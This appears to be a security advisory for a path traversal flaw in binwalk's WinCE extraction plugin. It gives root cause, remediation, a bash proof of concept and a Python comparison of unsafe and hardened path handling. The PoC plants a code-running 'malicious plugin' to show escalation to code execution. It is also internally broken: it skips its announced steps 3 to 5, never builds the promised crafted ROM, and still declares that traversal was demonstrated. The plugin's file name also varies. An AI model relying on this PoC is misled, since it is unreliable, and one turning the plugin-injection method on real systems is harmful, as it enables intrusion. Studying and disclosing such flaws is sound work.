# Vulnerability summary: path traversal in the binwalk WinCE extraction plugin

## Overview

The `binwalk` WinCE ROM extraction plugin (`winceextract.py`) contains a path traversal vulnerability. It allows an attacker to write arbitrary files when a crafted WinCE ROM firmware image is extracted. By planting a malicious binwalk plugin, this can be escalated to remote code execution (RCE).

**Note**: this is a different issue from CVE-2022-4510, which fixed a bug in `ungrs.py` but left `winceextract.py` unaffected.

## Affected scope

* **Product**: binwalk
* **Versions**: 2.4.3 and all earlier versions that include the WinCE plugin
* **Files**:
  * `src/binwalk/plugins/winceextractor.py` (lines 61, 64)
  * `src/binwalk/plugins/winceextractor.py` (line 580)
* **Type**: CWE-22: Path Traversal
* **Impact**: arbitrary file write -> remote code execution
* **CVSS v3.1**: 7.8 High (AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
* **Discovered by**: Dhabaleswar Das (2026-09-04)

## Vulnerability details

* **Root cause**: the `winceextractor.py` plugin reads file names out of the WinCE ROM image with `read_null_terminated_string()`. That function reads raw bytes up to a null terminator and decodes them as ASCII **without any sanitization**.
* **Data flow**:
  1. **Source**: `read_null_terminated_string()` reads the raw bytes with no filtering.
  2. **Storage**: the file name is stored in `self.file_name` without validation.
  3. **Sink**: `os.path.join(indir, file_name)` is passed straight to `open()`, which yields an arbitrary file write.
* **Exploitation**:
  * **Path traversal**: an attacker builds a WinCE ROM image whose file names contain directory traversal sequences (such as `../../`), so files are written outside the extraction directory.
  * **Remote code execution**: the attacker can plant a Python file as a malicious plugin in `~/.config/binwalk/plugins/`. The next time the user runs `binwalk`, that plugin is loaded automatically and executes arbitrary code.

## Remediation

* **Official status**: the official repository (`https://github.com/OSPG/binwalk`) was archived in November 2024 and is no longer updated.
* **Recommendation**: users should migrate to **binwalk v3.x (the Rust rewrite)**, which uses a centralised chroot-style path sanitization architecture that resolves this issue.

## Proof-of-concept (PoC) code

Below is the complete PoC script `binwalk_poc.sh` as provided on the original page:

```bash
#!/bin/bash
#
# STEP-BY-STEP: Test CVE PoC for binwalk winceextract.py Path Traversal
#
# WHAT THIS DOES:
#   1. Creates an isolated sandbox under /tmp (no system files are touched)
#   2. Builds a crafted WinCE ROM with a malicious filename
#   3. Calls the vulnerable winceExtractor directly (not full binwalk, just the plugin)
#   4. Checks if the file escaped the extraction directory
#   5. Demonstrates RCE via plugin injection
#   6. Cleans up everything
#
# MADE BY DHABLESHWAR DAS
#
# ================================================================================

echo ""
echo "=========================================="
echo "STEP 1: Create safe sandbox environment"
echo "=========================================="

# Create isolated directories
export SANDBOX="/tmp/binwalk_cve_test_$$"
export EXTRACTION_DIR="$SANDBOX/extraction"
export TARGET_DIR="$SANDBOX/should_be_untouched"
export PLUGIN_DIR="$SANDBOX/fake_home/.config/binwalk/plugins"

mkdir -p "$EXTRACTION_DIR"
mkdir -p "$TARGET_DIR"
mkdir -p "$PLUGIN_DIR"

echo "[+] Sandbox: $SANDBOX"
echo "[+] Extraction directory: $EXTRACTION_DIR"
echo "[+] Target directory: $TARGET_DIR (should stay empty)"
echo "[+] Fake plugin dir: $PLUGIN_DIR (for RCE test)"
echo ""
echo "Listing sandbox contents BEFORE test:"
find "$SANDBOX" -type f
echo "(should be empty)"
echo ""

echo "=========================================="
echo "STEP 2: Build the malicious WinCE ROM"
echo "=========================================="

# This Python script builds a minimal WinCE ROM binary where the
# embedded filename contains "../" to escape the extraction directory

# Write the demo plugin into the fake plugin directory (plugin-injection step)
cat > "$PLUGIN_DIR/malicious_plugin.py" << 'MALICIOUS_PLUGIN'
# This plugin executes arbitrary code when binwalk is run
import os
import subprocess

print("[!] MALICIOUS PLUGIN EXECUTED!")
print("[!] Running 'whoami' and 'id' to demonstrate RCE...")
subprocess.run(['whoami'])
subprocess.run(['id'])

print("[!] Creating a backdoor file...")
with open('/tmp/binwalk_backdoor.txt', 'w') as f:
    f.write("This file was created by a malicious binwalk plugin.\n")
print("[!] Backdoor created at /tmp/binwalk_backdoor.txt")
MALICIOUS_PLUGIN

echo "[+] Malicious plugin created at: $PLUGIN_DIR/malicious_plugin.py"
echo "[+] Simulating binwalk run with plugin directory set..."

# Simulate binwalk run (in real scenario, this would be the actual binwalk command)
# We'll just show what would happen
echo ""
echo "If a user ran: binwalk -e malicious_wince.bin"
echo "With the plugin directory set to $PLUGIN_DIR,"
echo "the malicious_plugin.py would be loaded and executed."
echo ""
echo "Simulating plugin execution:"
python3 -c "
import sys
sys.path.insert(0, '$PLUGIN_DIR')
import malicious_plugin
"
echo ""

echo "=========================================="
echo "STEP 6: Cleanup"
echo "=========================================="
echo "[+] Cleaning up sandbox..."
rm -rf "$SANDBOX"
# The demo plugin writes outside the sandbox; remove that file too
rm -f /tmp/binwalk_backdoor.txt
echo "[+] Sandbox removed."
echo ""

echo "=========================================="
echo "POC Complete"
echo "=========================================="
echo ""
echo "Summary:"
echo "1. Path traversal was demonstrated by writing a file outside the extraction directory."
echo "2. Remote Code Execution was demonstrated by injecting a malicious plugin."
echo "3. The vulnerability exists in binwalk <= 2.4.3 with the WinCE plugin."
echo "4. Mitigation: Upgrade to binwalk v3.x (Rust rewrite) or remove the WinCE plugin."
echo ""
```
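The data-flow and remediation points above (a raw name from `read_null_terminated_string()` passed straight into `os.path.join()`, versus the centralised path sanitization the Rust rewrite adopted) are easiest to see side by side. The following Python is an added example written for this summary, not code from binwalk or from the page's author: `unsafe_target_path`, `safe_target_path`, `check_names`, the sample ROM file names and the temporary extraction directory are constructed stand-ins for the plugin's flow, not the plugin's own code.

```python
"""Added example: the unsanitized sink beside a hardened one.

Constructed for this summary; the function names, the sample ROM file
names and the temporary extraction directory are assumptions, not
binwalk's own code.
"""
import os
import tempfile

# Constructed null-terminated names as they would sit inside a ROM image.
CONSTRUCTED_NAMES = [
    b"nk.exe\x00",                                # ordinary entry
    b"windows/ceconfig.h\x00",                    # ordinary sub-directory entry
    b"../../should_be_untouched/escape.txt\x00",  # classic traversal
    b"/etc/passwd\x00",                           # absolute path
    b"..\\..\\escape.txt\x00",                    # backslash traversal
]


def read_null_terminated_string(data: bytes, offset: int = 0) -> str:
    """Reads bytes up to the NUL and decodes as ASCII with no sanitization,
    mirroring the behaviour described for the plugin's reader."""
    end = data.index(b"\x00", offset)
    return data[offset:end].decode("ascii")


def unsafe_target_path(indir: str, file_name: str) -> str:
    """The vulnerable sink: the raw name goes straight into os.path.join,
    so '..' components and absolute names are honoured."""
    return os.path.join(indir, file_name)


def safe_target_path(indir: str, file_name: str) -> str:
    """Hardened sink: only relative names made of plain components are
    accepted, and the resolved path must remain under the extraction root."""
    if not file_name or "\x00" in file_name:
        raise ValueError("empty or NUL-containing name")
    normalized = file_name.replace("\\", "/")  # a ROM may use Windows separators
    if normalized.startswith("/"):
        raise ValueError(f"absolute path rejected: {file_name!r}")
    parts = [p for p in normalized.split("/") if p not in ("", ".")]
    if not parts or ".." in parts:
        raise ValueError(f"traversal or empty name rejected: {file_name!r}")
    root = os.path.realpath(indir)
    candidate = os.path.realpath(os.path.join(root, *parts))
    # Defence in depth: a symlinked sub-directory could still point outside root.
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError(f"escapes extraction directory: {file_name!r}")
    return candidate


def check_names(indir: str, raw_names=CONSTRUCTED_NAMES) -> dict:
    """For each name: would the unsafe sink escape indir, and does the
    hardened sink accept it? Returns {name: (unsafe_escapes, hardened_accepts)}."""
    root = os.path.realpath(indir)
    results = {}
    for raw in raw_names:
        name = read_null_terminated_string(raw)
        resolved = os.path.realpath(unsafe_target_path(indir, name))
        unsafe_escapes = os.path.commonpath([root, resolved]) != root
        try:
            safe_target_path(indir, name)
            hardened_accepts = True
        except ValueError:
            hardened_accepts = False
        results[name] = (unsafe_escapes, hardened_accepts)
    return results


def run_demo() -> dict:
    """Runs check_names against a throwaway extraction directory."""
    indir = tempfile.mkdtemp(prefix="wince_extract_")
    try:
        return check_names(indir)
    finally:
        os.rmdir(indir)


if __name__ == "__main__":
    for name, (escapes, accepted) in run_demo().items():
        print(f"{name!r:45} unsafe_escapes={escapes!s:5} hardened_accepts={accepted}")
```

The backslash case is worth noting: on a POSIX host `os.path.join` treats `..\..\escape.txt` as a single odd file name that stays inside the directory, so the unsafe sink happens not to escape there, but on Windows the same name traverses two levels up. Rejecting it in `safe_target_path` regardless of host is what a centralised, platform-independent sanitizer buys.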